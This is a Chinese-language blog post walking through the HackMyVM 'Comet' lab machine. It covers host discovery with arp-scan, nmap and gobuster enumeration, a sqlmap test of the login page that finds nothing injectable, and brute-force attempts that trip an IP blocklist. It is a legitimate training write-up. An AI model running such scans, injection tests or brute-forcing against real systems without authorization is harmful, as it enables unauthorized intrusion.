<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="ta0"><meta name="copyright" content="ta0"><meta name="generator" content="Hexo 7.1.1"><meta name="theme" content="hexo-theme-yun"><title>HackMyVM-Comet | ta0的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/myfa.ico"><link rel="mask-icon" href="/myfa.ico" color="#0078E7"><link rel="preload" href="/css/mycss.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"tao0845.github.io","root":"/","title":"做点小小记录","version":"1.10.11","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"local_search":{"path":"/search.xml"},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/mycss.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="难度:medium kali:192.168.56.104 靶机:192.168.56.182  ~&#x2F;Desktop">
<meta property="og:type" content="article">
<meta property="og:title" content="HackMyVM-Comet">
<meta property="og:url" content="https://tao0845.github.io/posts/151f8aa9/index.html">
<meta property="og:site_name" content="ta0的小站">
<meta property="og:description" content="难度:medium kali:192.168.56.104 靶机:192.168.56.182  ~&#x2F;Desktop">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXFWb.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXhyl.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXisg.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJX7es.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXNGK.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXe3a.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXAhS.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXKtN.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXZjC.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXyWL.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/06/11/OJXggi.png">
<meta property="article:published_time" content="2024-06-11T08:14:48.425Z">
<meta property="article:modified_time" content="2024-06-11T11:14:55.504Z">
<meta property="article:author" content="ta0">
<meta property="article:tag" content="fastcoll">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ooo.0x0.ooo/2024/06/11/OJXFWb.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="ta0"><img width="96" loading="lazy" src="/123.jpg" alt="ta0"></a><div class="site-author-name"><a href="/about/">ta0</a></div><span class="site-name">ta0的小站</span><sub class="site-subtitle">网安小白的成长记录</sub><div class="site-description">Learning For Fun</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">91</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">13</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">143</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/tao0845" title="GitHub" target="_blank" style="color:#6e5494"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://music.163.com/#/user/home?id=312924699" title="网易云音乐" target="_blank" style="color:#C20C0C"><span class="icon iconify" data-icon="ri:netease-cloud-music-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:2814928906@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="toc-number">3.</span> <span class="toc-text">密码爆破</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%A8%E6%88%B7%E5%90%8D%E7%88%86%E7%A0%B4getshell"><span class="toc-number">4.</span> <span class="toc-text">用户名爆破getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text">提权</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://tao0845.github.io/posts/151f8aa9/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="ta0"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="ta0的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">HackMyVM-Comet</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2024-06-11 16:14:48" itemprop="dateCreated datePublished" datetime="2024-06-11T16:14:48+08:00">2024-06-11</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><span class="icon iconify" data-icon="ri:file-word-line"></span></span> <span title="本文字数">3.7k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><span class="icon iconify" data-icon="ri:timer-line"></span></span> <span title="阅读时长">21m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><span class="icon iconify" data-icon="ri:eye-line"></span> <span id="busuanzi_value_page_pv"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/HackMyVM/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">HackMyVM</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/fastcoll/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">fastcoll</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><p><strong>难度:medium</strong></p>
<p><strong>kali:192.168.56.104</strong></p>
<p><strong>靶机:192.168.56.182</strong></p>
<pre class="language-bash" data-language="bash"><code class="language-bash"> ~/Desktop                                                                                                                                                                                                               root@kali2  <span class="token number">16</span>:37:45 
<span class="token operator">></span> arp-scan <span class="token parameter variable">-l</span>
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: <span class="token number">192.168</span>.56.104
Starting arp-scan <span class="token number">1.10</span>.0 with <span class="token number">256</span> hosts <span class="token punctuation">(</span>https://github.com/royhills/arp-scan<span class="token punctuation">)</span>
<span class="token number">192.168</span>.56.1    0a:00:27:00:00:05       <span class="token punctuation">(</span>Unknown: locally administered<span class="token punctuation">)</span>
<span class="token number">192.168</span>.56.100  08:00:27:44:da:d5       PCS Systemtechnik GmbH
<span class="token number">192.168</span>.56.182  08:00:27:56:cd:cd       PCS Systemtechnik GmbH

<span class="token number">3</span> packets received by filter, <span class="token number">0</span> packets dropped by kernel
Ending arp-scan <span class="token number">1.10</span>.0: <span class="token number">256</span> hosts scanned <span class="token keyword">in</span> <span class="token number">1.924</span> seconds <span class="token punctuation">(</span><span class="token number">133.06</span> hosts/sec<span class="token punctuation">)</span>. <span class="token number">3</span> responded</code></pre>

<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token operator">></span> nmap <span class="token number">192.168</span>.56.182 <span class="token parameter variable">-sV</span> <span class="token parameter variable">-A</span> 
Starting Nmap <span class="token number">7</span>.94SVN <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2024</span>-06-11 <span class="token number">16</span>:38 CST
Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.56.182
Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00029s latency<span class="token punctuation">)</span>.
Not shown: <span class="token number">998</span> closed tcp ports <span class="token punctuation">(</span>reset<span class="token punctuation">)</span>
PORT   STATE SERVICE VERSION
<span class="token number">22</span>/tcp <span class="token function">open</span>  <span class="token function">ssh</span>     OpenSSH <span class="token number">8</span>.4p1 Debian <span class="token number">5</span>+deb11u1 <span class="token punctuation">(</span>protocol <span class="token number">2.0</span><span class="token punctuation">)</span>
<span class="token operator">|</span> ssh-hostkey: 
<span class="token operator">|</span>   <span class="token number">3072</span> db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c <span class="token punctuation">(</span>RSA<span class="token punctuation">)</span>
<span class="token operator">|</span>   <span class="token number">256</span> <span class="token number">33</span>:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad <span class="token punctuation">(</span>ECDSA<span class="token punctuation">)</span>
<span class="token operator">|</span>_  <span class="token number">256</span> be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 <span class="token punctuation">(</span>ED25519<span class="token punctuation">)</span>
<span class="token number">80</span>/tcp <span class="token function">open</span>  http    Apache httpd <span class="token number">2.4</span>.54 <span class="token variable"><span class="token punctuation">((</span>Debian<span class="token punctuation">))</span></span>
<span class="token operator">|</span>_http-server-header: Apache/2.4.54 <span class="token punctuation">(</span>Debian<span class="token punctuation">)</span>
<span class="token operator">|</span>_http-title: CyberArray
MAC Address: 08:00:27:56:CD:CD <span class="token punctuation">(</span>Oracle VirtualBox virtual NIC<span class="token punctuation">)</span>
Device type: general purpose
Running: Linux <span class="token number">4</span>.X<span class="token operator">|</span><span class="token number">5</span>.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux <span class="token number">4.15</span> - <span class="token number">5.8</span>
Network Distance: <span class="token number">1</span> hop
Service Info: OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
<span class="token number">1</span>   <span class="token number">0.29</span> ms <span class="token number">192.168</span>.56.182

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token builtin class-name">.</span>
Nmap done: <span class="token number">1</span> IP address <span class="token punctuation">(</span><span class="token number">1</span> <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">7.94</span> seconds</code></pre>
<p>开放了22 80两个端口<br>去web看看<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXFWb.png" alt="OJXFWb.png" loading="lazy"><br>在博客界面下面找到两个用户名 <code>admin</code> <code>Owner</code>,先记着<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXhyl.png" alt="OJXhyl.png" loading="lazy"><br>剩下没找到什么利用的地方，扫一下目录</p>
<h2 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h2><pre class="language-zsh" data-language="zsh"><code class="language-zsh">&gt; gobuster dir -u http:&#x2F;&#x2F;192.168.56.182 -x html,txt,php,bak,zip --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;dirbuster&#x2F;directory-list-2.3-medium.txt
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
[+] Url:                     http:&#x2F;&#x2F;192.168.56.182
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;dirbuster&#x2F;directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster&#x2F;3.6
[+] Extensions:              bak,zip,html,txt,php
[+] Timeout:                 10s
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
Starting gobuster in directory enumeration mode
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
&#x2F;.html                (Status: 403) [Size: 279]
&#x2F;.php                 (Status: 403) [Size: 279]
&#x2F;images               (Status: 301) [Size: 317] [--&gt; http:&#x2F;&#x2F;192.168.56.182&#x2F;images&#x2F;]
&#x2F;index.html           (Status: 200) [Size: 7097]
&#x2F;contact.html         (Status: 200) [Size: 5886]
&#x2F;about.html           (Status: 200) [Size: 7024]
&#x2F;blog.html            (Status: 200) [Size: 8242]
&#x2F;support.html         (Status: 200) [Size: 6329]
&#x2F;login.php            (Status: 200) [Size: 1443]
&#x2F;ip.txt               (Status: 200) [Size: 0]
&#x2F;js                   (Status: 301) [Size: 313] [--&gt; http:&#x2F;&#x2F;192.168.56.182&#x2F;js&#x2F;]
&#x2F;.php                 (Status: 403) [Size: 279]
&#x2F;.html                (Status: 403) [Size: 279]
&#x2F;server-status        (Status: 403) [Size: 279]
Progress: 1011290 &#x2F; 1323366 (76.42%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1011290 &#x2F; 1323366 (76.42%)
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
Finished
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</code></pre>
<h2 id="密码爆破"><a href="#密码爆破" class="headerlink" title="密码爆破"></a>密码爆破</h2><p>有个ip.txt但是大小为0，剩下就是login.php了，只能从这里入手了<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXisg.png" alt="OJXisg.png" loading="lazy"><br>第一手肯定是想sql注入，抓包跑了一下，并没有跑出东西……</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">&gt; sqlmap -l sql.txt --batch  
        ___
       __H__
 ___ ___[)]_____ ___ ___  &#123;1.8.2#stable&#125;
|_ -| . [(]     | .&#39;| . |
|___|_  [&quot;]_|_|_|__,|  _|
      |_|V...       |_|   https:&#x2F;&#x2F;sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:43:39 &#x2F;2024-06-11&#x2F;

[16:43:39] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1&#x2F;1] URL:
GET http:&#x2F;&#x2F;192.168.56.182:80&#x2F;login.php
POST data: username&#x3D;admin&amp;password&#x3D;admin
do you want to test this URL? [Y&#x2F;n&#x2F;q]
&gt; Y
[16:43:39] [INFO] testing URL &#39;http:&#x2F;&#x2F;192.168.56.182:80&#x2F;login.php&#39;
[16:43:39] [INFO] using &#39;&#x2F;root&#x2F;.local&#x2F;share&#x2F;sqlmap&#x2F;output&#x2F;results-06112024_0443pm.csv&#39; as the CSV results file in multiple targets mode
[16:43:39] [INFO] testing connection to the target URL
[16:43:39] [INFO] checking if the target is protected by some kind of WAF&#x2F;IPS
[16:43:39] [INFO] testing if the target URL content is stable
[16:43:40] [INFO] target URL content is stable
[16:43:40] [INFO] testing if POST parameter &#39;username&#39; is dynamic
[16:43:40] [WARNING] POST parameter &#39;username&#39; does not appear to be dynamic
[16:43:40] [WARNING] heuristic (basic) test shows that POST parameter &#39;username&#39; might not be injectable
[16:43:40] [INFO] testing for SQL injection on POST parameter &#39;username&#39;
[16:43:40] [INFO] testing &#39;AND boolean-based blind - WHERE or HAVING clause&#39;
[16:43:40] [INFO] testing &#39;Boolean-based blind - Parameter replace (original value)&#39;
[16:43:40] [INFO] testing &#39;MySQL &gt;&#x3D; 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)&#39;
[16:43:40] [INFO] testing &#39;PostgreSQL AND error-based - WHERE or HAVING clause&#39;
[16:43:40] [INFO] testing &#39;Microsoft SQL Server&#x2F;Sybase AND error-based - WHERE or HAVING clause (IN)&#39;
[16:43:40] [INFO] testing &#39;Oracle AND error-based - WHERE or HAVING clause (XMLType)&#39;
[16:43:40] [INFO] testing &#39;Generic inline queries&#39;
[16:43:40] [INFO] testing &#39;PostgreSQL &gt; 8.1 stacked queries (comment)&#39;
[16:43:40] [INFO] testing &#39;Microsoft SQL Server&#x2F;Sybase stacked queries (comment)&#39;
[16:43:40] [INFO] testing &#39;Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)&#39;
[16:43:40] [INFO] testing &#39;MySQL &gt;&#x3D; 5.0.12 AND time-based blind (query SLEEP)&#39;
[16:43:40] [INFO] testing &#39;PostgreSQL &gt; 8.1 AND time-based blind&#39;
[16:43:40] [INFO] testing &#39;Microsoft SQL Server&#x2F;Sybase time-based blind (IF)&#39;
[16:43:40] [INFO] testing &#39;Oracle AND time-based blind&#39;
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y&#x2F;n] Y
[16:43:40] [INFO] testing &#39;Generic UNION query (NULL) - 1 to 10 columns&#39;
[16:43:40] [WARNING] POST parameter &#39;username&#39; does not seem to be injectable
[16:43:40] [INFO] testing if POST parameter &#39;password&#39; is dynamic
[16:43:40] [WARNING] POST parameter &#39;password&#39; does not appear to be dynamic
[16:43:40] [WARNING] heuristic (basic) test shows that POST parameter &#39;password&#39; might not be injectable
[16:43:40] [INFO] testing for SQL injection on POST parameter &#39;password&#39;
[16:43:40] [INFO] testing &#39;AND boolean-based blind - WHERE or HAVING clause&#39;
[16:43:40] [INFO] testing &#39;Boolean-based blind - Parameter replace (original value)&#39;
[16:43:40] [INFO] testing &#39;MySQL &gt;&#x3D; 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)&#39;
[16:43:40] [INFO] testing &#39;PostgreSQL AND error-based - WHERE or HAVING clause&#39;
[16:43:40] [INFO] testing &#39;Microsoft SQL Server&#x2F;Sybase AND error-based - WHERE or HAVING clause (IN)&#39;
[16:43:40] [INFO] testing &#39;Oracle AND error-based - WHERE or HAVING clause (XMLType)&#39;
[16:43:40] [INFO] testing &#39;Generic inline queries&#39;
[16:43:40] [INFO] testing &#39;PostgreSQL &gt; 8.1 stacked queries (comment)&#39;
[16:43:40] [INFO] testing &#39;Microsoft SQL Server&#x2F;Sybase stacked queries (comment)&#39;
[16:43:41] [INFO] testing &#39;Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)&#39;
[16:45:43] [WARNING] user aborted during detection phase^[[A^[[A^[[A^[[A^C
how do you want to proceed? [ne(X)t target&#x2F;(s)kip current test&#x2F;(e)nd detection phase&#x2F;(n)ext parameter&#x2F;(c)hange verbosity&#x2F;(q)uit] s
[16:45:58] [INFO] testing &#39;MySQL &gt;&#x3D; 5.0.12 AND time-based blind (query SLEEP)&#39;
[16:45:58] [INFO] testing &#39;PostgreSQL &gt; 8.1 AND time-based blind&#39;
[16:45:58] [INFO] testing &#39;Microsoft SQL Server&#x2F;Sybase time-based blind (IF)&#39;
[16:45:58] [INFO] testing &#39;Oracle AND time-based blind&#39;
[16:45:58] [INFO] testing &#39;Generic UNION query (NULL) - 1 to 10 columns&#39;
[16:45:58] [WARNING] POST parameter &#39;password&#39; does not seem to be injectable
[16:45:58] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for &#39;--level&#39;&#x2F;&#39;--risk&#39; options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option &#39;--tamper&#39; (e.g. &#39;--tamper&#x3D;space2comment&#39;) and&#x2F;or switch &#39;--random-agent&#39;, skipping to the next target
[16:45:58] [INFO] you can find results of scanning in multiple targets mode inside the CSV file &#39;&#x2F;root&#x2F;.local&#x2F;share&#x2F;sqlmap&#x2F;output&#x2F;results-06112024_0443pm.csv&#39;

[*] ending @ 16:45:58 &#x2F;2024-06-11&#x2F;
</code></pre>
<p>额，sql注入不行，试试爆破，直接拿到，试试admin的弱口令<br>不过我用burpsuite爆破失败了，而且login.php界面卡住进不去<br><img src="https://ooo.0x0.ooo/2024/06/11/OJX7es.png" alt="OJX7es.png" loading="lazy"><br>我在windows进不去，但是kali能进去<br>不过输错了一次密码之后也进不去了，好像后天设了限制，输出一次ip进去黑名单，我于是想到了ip.txt，curl一下果然发现了我的ip在里面</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">&gt; curl http:&#x2F;&#x2F;192.168.56.182&#x2F;ip.txt   
192.168.56.1</code></pre>
